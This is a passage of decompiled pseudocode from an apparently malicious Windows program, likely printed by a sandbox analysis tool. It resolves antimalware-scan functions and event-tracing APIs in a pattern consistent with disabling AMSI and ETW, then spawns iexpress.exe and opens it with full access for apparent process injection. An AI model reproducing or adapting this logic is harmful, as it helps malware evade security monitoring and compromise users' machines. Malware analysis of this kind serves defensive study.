					asm("sbb eax, eax");
					_t1624 = _t1623 + 1;
					_t2084 = _t1624;
					 *((char*)(_t2075 - 5)) = _t1624;
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t2075 - 0x6a4, E02514D64( *((intOrPtr*)(_t2075 - 0x6a8))));
				_push( *((intOrPtr*)(_t2075 - 0x6a4)));
				_t1636 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x6b0, _t1636, 0x252ad5c);
				E02514A98(_t2075 - 0x6ac, E02514D64( *((intOrPtr*)(_t2075 - 0x6b0))));
				_pop(_t1704); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x6ac)), _t1625, _t1704, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0x6b4, E02514D64( *((intOrPtr*)(_t2075 - 0x6b8))));
				_push( *((intOrPtr*)(_t2075 - 0x6b4)));
				_t1637 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x6c0, _t1637, 0x252ad5c);
				E02514A98(_t2075 - 0x6bc, E02514D64( *((intOrPtr*)(_t2075 - 0x6c0))));
				_pop(_t1709); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x6bc)), _t1625, _t1709, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x6c4, E02514D64( *((intOrPtr*)(_t2075 - 0x6c8))));
				_push( *((intOrPtr*)(_t2075 - 0x6c4)));
				_t1638 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x6d0, _t1638, 0x252ad5c);
				E02514A98(_t2075 - 0x6cc, E02514D64( *((intOrPtr*)(_t2075 - 0x6d0))));
				_pop(_t1714); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x6cc)), _t1625, _t1714, _t2074); // executed
				_t1715 =  *0x256dd00; // 0x2a1f418
				_t674 =  *0x256da80; // 0x7f190018, executed
				E02525580(_t674, _t1625, _t2075 - 0x6d4, _t1715, _t2073, _t2074); // executed
				E025148F4(0x256da48,  *((intOrPtr*)(_t2075 - 0x6d4)));
				_t678 =  *0x256dcf0; // 0x2a51bb8
				_t679 = E02517DA0(_t678, _t2084);
				_t1640 = _t2075 - 0x6d8;
				_t680 =  *0x256da48; // 0x7f210018
				E02525B34(_t680, _t1625, _t2075 - 0x6d8, _t679, _t2074);
				E025148F4(0x256da4c,  *((intOrPtr*)(_t2075 - 0x6d8)));
				_t684 =  *0x256da4c; // 0x7f110018
				E02525AC0(_t684, _t1625, _t2075 - 0x6d8, _t2075 - 0x6e0, _t2073, _t2074);
				E02525910( *((intOrPtr*)(_t2075 - 0x6e0)), _t1640, _t2075 - 0x6dc);
				E025148F4(0x256da84,  *((intOrPtr*)(_t2075 - 0x6dc)));
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t2075 - 0x6e4, E02514D64( *((intOrPtr*)(_t2075 - 0x6e8))));
				_push( *((intOrPtr*)(_t2075 - 0x6e4)));
				_t1641 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x6f0, _t1641, 0x252ad5c);
				E02514A98(_t2075 - 0x6ec, E02514D64( *((intOrPtr*)(_t2075 - 0x6f0))));
				_pop(_t1726); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x6ec)), _t1625, _t1726, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0x6f4, E02514D64( *((intOrPtr*)(_t2075 - 0x6f8))));
				_push( *((intOrPtr*)(_t2075 - 0x6f4)));
				_t1642 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x700, _t1642, 0x252ad5c);
				E02514A98(_t2075 - 0x6fc, E02514D64( *((intOrPtr*)(_t2075 - 0x700))));
				_pop(_t1731); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x6fc)), _t1625, _t1731, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("UacScan");
				E02514C24();
				E02514A98(_t2075 - 0x704, E02514D64( *((intOrPtr*)(_t2075 - 0x708))));
				_push( *((intOrPtr*)(_t2075 - 0x704)));
				_t1643 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x710, _t1643, 0x252ad5c);
				E02514A98(_t2075 - 0x70c, E02514D64( *((intOrPtr*)(_t2075 - 0x710))));
				_pop(_t1736); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x70c)), _t1625, _t1736, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("UacInitialize");
				E02514C24();
				E02514A98(_t2075 - 0x714, E02514D64( *((intOrPtr*)(_t2075 - 0x718))));
				_push( *((intOrPtr*)(_t2075 - 0x714)));
				_t1644 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x720, _t1644, 0x252ad5c);
				E02514A98(_t2075 - 0x71c, E02514D64( *((intOrPtr*)(_t2075 - 0x720))));
				_pop(_t1741); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x71c)), _t1625, _t1741, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x724, E02514D64( *((intOrPtr*)(_t2075 - 0x728))));
				_push( *((intOrPtr*)(_t2075 - 0x724)));
				_t1645 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x730, _t1645, 0x252ad5c);
				E02514A98(_t2075 - 0x72c, E02514D64( *((intOrPtr*)(_t2075 - 0x730))));
				_pop(_t1746); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x72c)), _t1625, _t1746, _t2074);
				_t760 =  *0x256dcec; // 0x0
				E02514CB0(_t760, 0x252ae54);
				if(_t2084 == 0) {
					_t1458 =  *0x256dce4; // 0x2a51b88
					E02514CB0(_t1458, 0x252ae54);
					if(_t2084 != 0) {
						_t1460 =  *0x256dce8; // 0x0
						E02514CB0(_t1460, 0x252ae54);
						if(_t2084 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t2075 - 0x734, E02514D64( *((intOrPtr*)(_t2075 - 0x738))));
							_push( *((intOrPtr*)(_t2075 - 0x734)));
							_t1667 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x740, _t1667, 0x252ad5c);
							E02514A98(_t2075 - 0x73c, E02514D64( *((intOrPtr*)(_t2075 - 0x740))));
							_pop(_t2030);
							E025236CC( *((intOrPtr*)(_t2075 - 0x73c)), _t1625, _t2030, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x744, E02514D64( *((intOrPtr*)(_t2075 - 0x748))));
							_push( *((intOrPtr*)(_t2075 - 0x744)));
							_t1668 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x750, _t1668, 0x252ad5c);
							E02514A98(_t2075 - 0x74c, E02514D64( *((intOrPtr*)(_t2075 - 0x750))));
							_pop(_t2035);
							E025236CC( *((intOrPtr*)(_t2075 - 0x74c)), _t1625, _t2035, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push(0x252b020);
							_push(0);
							_push(0x252b02c);
							_push(0);
							_push(0x252b038);
							_push(0);
							_push(0x252b044);
							E02514C24();
							E02514A98(_t2075 - 0x754, E02514D64( *((intOrPtr*)(_t2075 - 0x758))));
							_push( *((intOrPtr*)(_t2075 - 0x754)));
							_t1669 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x760, _t1669, 0x252ad5c);
							E02514A98(_t2075 - 0x75c, E02514D64( *((intOrPtr*)(_t2075 - 0x760))));
							_pop(_t2040);
							E025236CC( *((intOrPtr*)(_t2075 - 0x75c)), _t1625, _t2040, _t2074);
							E02514A98(_t2075 - 0x764, "ReportEventA");
							_push( *((intOrPtr*)(_t2075 - 0x764)));
							E02514A98(_t2075 - 0x768, "advapi32");
							_pop(_t2043);
							E025236CC( *((intOrPtr*)(_t2075 - 0x768)), _t1625, _t2043, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x76c, E02514D64( *((intOrPtr*)(_t2075 - 0x770))));
							_push( *((intOrPtr*)(_t2075 - 0x76c)));
							_t1670 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x778, _t1670, 0x252ad5c);
							E02514A98(_t2075 - 0x774, E02514D64( *((intOrPtr*)(_t2075 - 0x778))));
							_pop(_t2048);
							E025236CC( *((intOrPtr*)(_t2075 - 0x774)), _t1625, _t2048, _t2074);
							E02514A98(_t2075 - 0x77c, "SystemFunction035");
							_push( *((intOrPtr*)(_t2075 - 0x77c)));
							E02514A98(_t2075 - 0x780, "advapi32");
							_pop(_t2051);
							E025236CC( *((intOrPtr*)(_t2075 - 0x780)), _t1625, _t2051, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x784, E02514D64( *((intOrPtr*)(_t2075 - 0x788))));
							_push( *((intOrPtr*)(_t2075 - 0x784)));
							_t1671 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x790, _t1671, 0x252ad5c);
							E02514A98(_t2075 - 0x78c, E02514D64( *((intOrPtr*)(_t2075 - 0x790))));
							_pop(_t2056);
							E025236CC( *((intOrPtr*)(_t2075 - 0x78c)), _t1625, _t2056, _t2074);
							E02514A98(_t2075 - 0x794, "ReportEventW");
							_push( *((intOrPtr*)(_t2075 - 0x794)));
							E02514A98(_t2075 - 0x798, "advapi32");
							_pop(_t2059);
							E025236CC( *((intOrPtr*)(_t2075 - 0x798)), _t1625, _t2059, _t2074);
							E02524F34(E02514DBC(0x256da84), _t1625, _t1671, _t2073, _t2074, _t2087);
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x79c, E02514D64( *((intOrPtr*)(_t2075 - 0x7a0))));
				_push( *((intOrPtr*)(_t2075 - 0x79c)));
				_t1646 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x7a8, _t1646, 0x252ad5c);
				E02514A98(_t2075 - 0x7a4, E02514D64( *((intOrPtr*)(_t2075 - 0x7a8))));
				_pop(_t1752); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x7a4)), _t1625, _t1752, _t2074);
				_t776 =  *0x256dce8; // 0x0
				E02514CB0(_t776, 0x252ae54);
				if(_t2084 == 0) {
					_t1325 =  *0x256dce4; // 0x2a51b88
					E02514CB0(_t1325, 0x252ae54);
					if(_t2084 != 0) {
						_t1327 =  *0x256dcec; // 0x0
						E02514CB0(_t1327, 0x252ae54);
						if(_t2084 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t2075 - 0x7ac, E02514D64( *((intOrPtr*)(_t2075 - 0x7b0))));
							_push( *((intOrPtr*)(_t2075 - 0x7ac)));
							_t1660 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x7b8, _t1660, 0x252ad5c);
							E02514A98(_t2075 - 0x7b4, E02514D64( *((intOrPtr*)(_t2075 - 0x7b8))));
							_pop(_t1983);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7b4)), _t1625, _t1983, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x7bc, E02514D64( *((intOrPtr*)(_t2075 - 0x7c0))));
							_push( *((intOrPtr*)(_t2075 - 0x7bc)));
							_t1661 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x7c8, _t1661, 0x252ad5c);
							E02514A98(_t2075 - 0x7c4, E02514D64( *((intOrPtr*)(_t2075 - 0x7c8))));
							_pop(_t1988);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7c4)), _t1625, _t1988, _t2074);
							WinExec("iexpress", 0);
							 *0x256da9c = E025245F8("iexpress.exe");
							_t1360 =  *0x256da9c; // 0x0
							 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t1360);
							_t1362 =  *0x256daa0; // 0x0
							_push(_t1362);
							L025237E0();
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x7cc, E02514D64( *((intOrPtr*)(_t2075 - 0x7d0))));
							_push( *((intOrPtr*)(_t2075 - 0x7cc)));
							_t1662 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x7d8, _t1662, 0x252ad5c);
							E02514A98(_t2075 - 0x7d4, E02514D64( *((intOrPtr*)(_t2075 - 0x7d8))));
							_pop(_t1993);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7d4)), _t1625, _t1993, _t2074);
							_t1378 = E02514DBC(0x256da84);
							_t1379 =  *0x256daa0; // 0x0
							E02523F94(_t1379, _t1625, _t1378, _t2073, _t2074, _t2087);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x7dc, E02514D64( *((intOrPtr*)(_t2075 - 0x7e0))));
							_push( *((intOrPtr*)(_t2075 - 0x7dc)));
							_t1663 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x7e8, _t1663, 0x252ad5c);
							E02514A98(_t2075 - 0x7e4, E02514D64( *((intOrPtr*)(_t2075 - 0x7e8))));
							_pop(_t1999);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7e4)), _t1625, _t1999, _t2074);
							E02514A98(_t2075 - 0x7ec, "ReportEventA");
							_push( *((intOrPtr*)(_t2075 - 0x7ec)));
							E02514A98(_t2075 - 0x7f0, "advapi32");
							_pop(_t2002);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7f0)), _t1625, _t2002, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x7f4, E02514D64( *((intOrPtr*)(_t2075 - 0x7f8))));
							_push( *((intOrPtr*)(_t2075 - 0x7f4)));
							_t1664 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x800, _t1664, 0x252ad5c);
							E02514A98(_t2075 - 0x7fc, E02514D64( *((intOrPtr*)(_t2075 - 0x800))));
							_pop(_t2007);
							E025236CC( *((intOrPtr*)(_t2075 - 0x7fc)), _t1625, _t2007, _t2074);
							E02514A98(_t2075 - 0x804, "SystemFunction035");
							_push( *((intOrPtr*)(_t2075 - 0x804)));
							E02514A98(_t2075 - 0x808, "advapi32");
							_pop(_t2010);
							E025236CC( *((intOrPtr*)(_t2075 - 0x808)), _t1625, _t2010, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x80c, E02514D64( *((intOrPtr*)(_t2075 - 0x810))));
							_push( *((intOrPtr*)(_t2075 - 0x80c)));
							_t1665 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x818, _t1665, 0x252ad5c);
							E02514A98(_t2075 - 0x814, E02514D64( *((intOrPtr*)(_t2075 - 0x818))));
							_pop(_t2015);
							E025236CC( *((intOrPtr*)(_t2075 - 0x814)), _t1625, _t2015, _t2074);
							E02514A98(_t2075 - 0x81c, "ReportEventW");
							_push( *((intOrPtr*)(_t2075 - 0x81c)));
							E02514A98(_t2075 - 0x820, "advapi32");
							_pop(_t2018);
							E025236CC( *((intOrPtr*)(_t2075 - 0x820)), _t1625, _t2018, _t2074);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x824, E02514D64( *((intOrPtr*)(_t2075 - 0x828))));
							_push( *((intOrPtr*)(_t2075 - 0x824)));
							_t1666 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x830, _t1666, 0x252ad5c);
							E02514A98(_t2075 - 0x82c, E02514D64( *((intOrPtr*)(_t2075 - 0x830))));
							_pop(_t2023);
							E025236CC( *((intOrPtr*)(_t2075 - 0x82c)), _t1625, _t2023, _t2074);
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x834, E02514D64( *((intOrPtr*)(_t2075 - 0x838))));
				_push( *((intOrPtr*)(_t2075 - 0x834)));
				_t1647 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x840, _t1647, 0x252ad5c);
				E02514A98(_t2075 - 0x83c, E02514D64( *((intOrPtr*)(_t2075 - 0x840))));
				_pop(_t1758); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x83c)), _t1625, _t1758, _t2074);
				_t792 =  *0x256dce4; // 0x2a51b88
				E02514CB0(_t792, 0x252ae54);
				if(_t2084 == 0) {
					_t1286 =  *0x256dce8; // 0x0
					E02514CB0(_t1286, 0x252ae54);
					if(_t2084 != 0) {
						_t1288 =  *0x256dcec; // 0x0
						E02514CB0(_t1288, 0x252ae54);
						if(_t2084 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t2075 - 0x844, E02514D64( *((intOrPtr*)(_t2075 - 0x848))));
							_push( *((intOrPtr*)(_t2075 - 0x844)));
							_t1658 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x850, _t1658, 0x252ad5c);
							E02514A98(_t2075 - 0x84c, E02514D64( *((intOrPtr*)(_t2075 - 0x850))));
							_pop(_t1969); // executed
							E025236CC( *((intOrPtr*)(_t2075 - 0x84c)), _t1625, _t1969, _t2074); // executed
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t2075 - 0x854, E02514D64( *((intOrPtr*)(_t2075 - 0x858))));
							_push( *((intOrPtr*)(_t2075 - 0x854)));
							_t1659 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t2075 - 0x860, _t1659, 0x252ad5c);
							E02514A98(_t2075 - 0x85c, E02514D64( *((intOrPtr*)(_t2075 - 0x860))));
							_pop(_t1974); // executed
							E025236CC( *((intOrPtr*)(_t2075 - 0x85c)), _t1625, _t1974, _t2074); // executed
							E02512FC4(0, _t2075 - 0x864);
							_push( *((intOrPtr*)(_t2075 - 0x864)));
							_t1322 = E02514DBC(0x256da84);
							_pop(_t1323); // executed
							E025248A4(_t1323, _t1625, _t1322, _t2074, _t2087); // executed
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push(0x252b020);
				_push(0);
				_push(0x252b02c);
				_push(0);
				_push(0x252b038);
				_push(0);
				_push(0x252b044);
				E02514C24();
				E02514A98(_t2075 - 0x868, E02514D64( *((intOrPtr*)(_t2075 - 0x86c))));
				_push( *((intOrPtr*)(_t2075 - 0x868)));
				_t1648 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x874, _t1648, 0x252ad5c);
				E02514A98(_t2075 - 0x870, E02514D64( *((intOrPtr*)(_t2075 - 0x874))));
				_pop(_t1764); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x870)), _t1625, _t1764, _t2074); // executed
				E02514A98(_t2075 - 0x878, "ReportEventA");
				_push( *((intOrPtr*)(_t2075 - 0x878)));
				E02514A98(_t2075 - 0x87c, "advapi32");
				_pop(_t1767); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x87c)), _t1625, _t1767, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0x880, E02514D64( *((intOrPtr*)(_t2075 - 0x884))));
				_push( *((intOrPtr*)(_t2075 - 0x880)));
				_t1649 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x88c, _t1649, 0x252ad5c);
				E02514A98(_t2075 - 0x888, E02514D64( *((intOrPtr*)(_t2075 - 0x88c))));
				_pop(_t1772); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x888)), _t1625, _t1772, _t2074); // executed
				E02514A98(_t2075 - 0x890, "SystemFunction035");
				_push( *((intOrPtr*)(_t2075 - 0x890)));
				E02514A98(_t2075 - 0x894, "advapi32");
				_pop(_t1775); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x894)), _t1625, _t1775, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0x898, E02514D64( *((intOrPtr*)(_t2075 - 0x89c))));
				_push( *((intOrPtr*)(_t2075 - 0x898)));
				_t1650 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x8a4, _t1650, 0x252ad5c);
				E02514A98(_t2075 - 0x8a0, E02514D64( *((intOrPtr*)(_t2075 - 0x8a4))));
				_pop(_t1780); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8a0)), _t1625, _t1780, _t2074); // executed
				E02514A98(_t2075 - 0x8a8, "ReportEventW");
				_push( *((intOrPtr*)(_t2075 - 0x8a8)));
				E02514A98(_t2075 - 0x8ac, "advapi32");
				_pop(_t1783); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8ac)), _t1625, _t1783, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x8b0, E02514D64( *((intOrPtr*)(_t2075 - 0x8b4))));
				_push( *((intOrPtr*)(_t2075 - 0x8b0)));
				_t1651 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x8bc, _t1651, 0x252ad5c);
				E02514A98(_t2075 - 0x8b8, E02514D64( *((intOrPtr*)(_t2075 - 0x8bc))));
				_pop(_t1788); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8b8)), _t1625, _t1788, _t2074); // executed
				E02514A98(_t2075 - 0x8c0, "ShellExecuteExA");
				_push( *((intOrPtr*)(_t2075 - 0x8c0)));
				E02514A98(_t2075 - 0x8c4, "shell32");
				_pop(_t1791); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8c4)), _t1625, _t1791, _t2074); // executed
				E02514A98(_t2075 - 0x8c8, "SuspendThread");
				_push( *((intOrPtr*)(_t2075 - 0x8c8)));
				E02514A98(_t2075 - 0x8cc, "kernel32");
				_pop(_t1794);
				E025236CC( *((intOrPtr*)(_t2075 - 0x8cc)), _t1625, _t1794, _t2074);
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0x8d0, E02514D64( *((intOrPtr*)(_t2075 - 0x8d4))));
				_push( *((intOrPtr*)(_t2075 - 0x8d0)));
				_t1652 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x8dc, _t1652, 0x252ad5c);
				E02514A98(_t2075 - 0x8d8, E02514D64( *((intOrPtr*)(_t2075 - 0x8dc))));
				_pop(_t1799); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8d8)), _t1625, _t1799, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t2075 - 0x8e0, E02514D64( *((intOrPtr*)(_t2075 - 0x8e4))));
				_push( *((intOrPtr*)(_t2075 - 0x8e0)));
				_t1653 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x8ec, _t1653, 0x252ad5c);
				E02514A98(_t2075 - 0x8e8, E02514D64( *((intOrPtr*)(_t2075 - 0x8ec))));
				_pop(_t1804); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8e8)), _t1625, _t1804, _t2074); // executed
				E02514A98(_t2075 - 0x8f0, "WmiReceiveNotificationsW");
				_push( *((intOrPtr*)(_t2075 - 0x8f0)));
				E02514A98(_t2075 - 0x8f4, "advapi32");
				_pop(_t1807); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0x8f4)), _t1625, _t1807, _t2074); // executed
				E02514A98(_t2075 - 0x8f8, "WmiReceiveNotificationsA");
				_push( *((intOrPtr*)(_t2075 - 0x8f8)));
				E02514A98(_t2075 - 0x8fc, "advapi32");
				_pop(_t1810);
				E025236CC( *((intOrPtr*)(_t2075 - 0x8fc)), _t1625, _t1810, _t2074);
				E02514A98(_t2075 - 0x900, "WmiQuerySingleInstanceW");
				_push( *((intOrPtr*)(_t2075 - 0x900)));
				E02514A98(_t2075 - 0x904, "advapi32");
				_pop(_t1813);
				E025236CC( *((intOrPtr*)(_t2075 - 0x904)), _t1625, _t1813, _t2074);
				E02514A98(_t2075 - 0x908, "NotifyChangeEventLog");
				_push( *((intOrPtr*)(_t2075 - 0x908)));
				E02514A98(_t2075 - 0x90c, "advapi32");
				_pop(_t1816);
				E025236CC( *((intOrPtr*)(_t2075 - 0x90c)), _t1625, _t1816, _t2074);
				E02514A98(_t2075 - 0x910, "WmiQueryAllDataA");
				_push( *((intOrPtr*)(_t2075 - 0x910)));
				E02514A98(_t2075 - 0x914, "advapi32");
				_pop(_t1819);
				E025236CC( *((intOrPtr*)(_t2075 - 0x914)), _t1625, _t1819, _t2074);
				E02514A98(_t2075 - 0x918, "WmiOpenBlock");
				_push( *((intOrPtr*)(_t2075 - 0x918)));
				E02514A98(_t2075 - 0x91c, "advapi32");
				_pop(_t1822);
				E025236CC( *((intOrPtr*)(_t2075 - 0x91c)), _t1625, _t1822, _t2074);
				E02514A98(_t2075 - 0x920, "WmiNotificationRegistrationW");
				_push( *((intOrPtr*)(_t2075 - 0x920)));
				E02514A98(_t2075 - 0x924, "advapi32");
				_pop(_t1825);
				E025236CC( *((intOrPtr*)(_t2075 - 0x924)), _t1625, _t1825, _t2074);
				E02514A98(_t2075 - 0x928, "TraceQueryInformation");
				_push( *((intOrPtr*)(_t2075 - 0x928)));
				E02514A98(_t2075 - 0x92c, "advapi32");
				_pop(_t1828);
				E025236CC( *((intOrPtr*)(_t2075 - 0x92c)), _t1625, _t1828, _t2074);
				E02514A98(_t2075 - 0x930, "TraceSetInformation");
				_push( *((intOrPtr*)(_t2075 - 0x930)));
				E02514A98(_t2075 - 0x934, "advapi32");
				_pop(_t1831);
				E025236CC( *((intOrPtr*)(_t2075 - 0x934)), _t1625, _t1831, _t2074);
				E02514A98(_t2075 - 0x938, "TraceMessageVa");
				_push( *((intOrPtr*)(_t2075 - 0x938)));
				E02514A98(_t2075 - 0x93c, "advapi32");
				_pop(_t1834);
				E025236CC( *((intOrPtr*)(_t2075 - 0x93c)), _t1625, _t1834, _t2074);
				E02514A98(_t2075 - 0x940, "TraceMessage");
				_push( *((intOrPtr*)(_t2075 - 0x940)));
				E02514A98(_t2075 - 0x944, "advapi32");
				_pop(_t1837);
				E025236CC( *((intOrPtr*)(_t2075 - 0x944)), _t1625, _t1837, _t2074);
				E02514A98(_t2075 - 0x948, "TraceEvent");
				_push( *((intOrPtr*)(_t2075 - 0x948)));
				E02514A98(_t2075 - 0x94c, "advapi32");
				_pop(_t1840);
				E025236CC( *((intOrPtr*)(_t2075 - 0x94c)), _t1625, _t1840, _t2074);
				E02514A98(_t2075 - 0x950, "TraceEventInstance");
				_push( *((intOrPtr*)(_t2075 - 0x950)));
				E02514A98(_t2075 - 0x954, "advapi32");
				_pop(_t1843);
				E025236CC( *((intOrPtr*)(_t2075 - 0x954)), _t1625, _t1843, _t2074);
				E02514A98(_t2075 - 0x958, "SetTraceCallback");
				_push( *((intOrPtr*)(_t2075 - 0x958)));
				E02514A98(_t2075 - 0x95c, "advapi32");
				_pop(_t1846);
				E025236CC( *((intOrPtr*)(_t2075 - 0x95c)), _t1625, _t1846, _t2074);
				E02514A98(_t2075 - 0x960, "SetSecurityInfo");
				_push( *((intOrPtr*)(_t2075 - 0x960)));
				E02514A98(_t2075 - 0x964, "advapi32");
				_pop(_t1849);
				E025236CC( *((intOrPtr*)(_t2075 - 0x964)), _t1625, _t1849, _t2074);
				E02514A98(_t2075 - 0x968, "SetSecurityInfoExA");
				_push( *((intOrPtr*)(_t2075 - 0x968)));
				E02514A98(_t2075 - 0x96c, "advapi32");
				_pop(_t1852);
				E025236CC( *((intOrPtr*)(_t2075 - 0x96c)), _t1625, _t1852, _t2074);
				E02514A98(_t2075 - 0x970, "SetSecurityInfoExW");
				_push( *((intOrPtr*)(_t2075 - 0x970)));
				E02514A98(_t2075 - 0x974, "advapi32");
				_pop(_t1855);
				E025236CC( *((intOrPtr*)(_t2075 - 0x974)), _t1625, _t1855, _t2074);
				E02514A98(_t2075 - 0x978, "SetSecurityAccessMask");
				_push( *((intOrPtr*)(_t2075 - 0x978)));
				E02514A98(_t2075 - 0x97c, "advapi32");
				_pop(_t1858);
				E025236CC( *((intOrPtr*)(_t2075 - 0x97c)), _t1625, _t1858, _t2074);
				E02514A98(_t2075 - 0x980, "SetPrivateObjectSecurityEx");
				_push( *((intOrPtr*)(_t2075 - 0x980)));
				E02514A98(_t2075 - 0x984, "advapi32");
				_pop(_t1861);
				E025236CC( *((intOrPtr*)(_t2075 - 0x984)), _t1625, _t1861, _t2074);
				E02514A98(_t2075 - 0x988, "SetKernelObjectSecurity");
				_push( *((intOrPtr*)(_t2075 - 0x988)));
				E02514A98(_t2075 - 0x98c, "advapi32");
				_pop(_t1864);
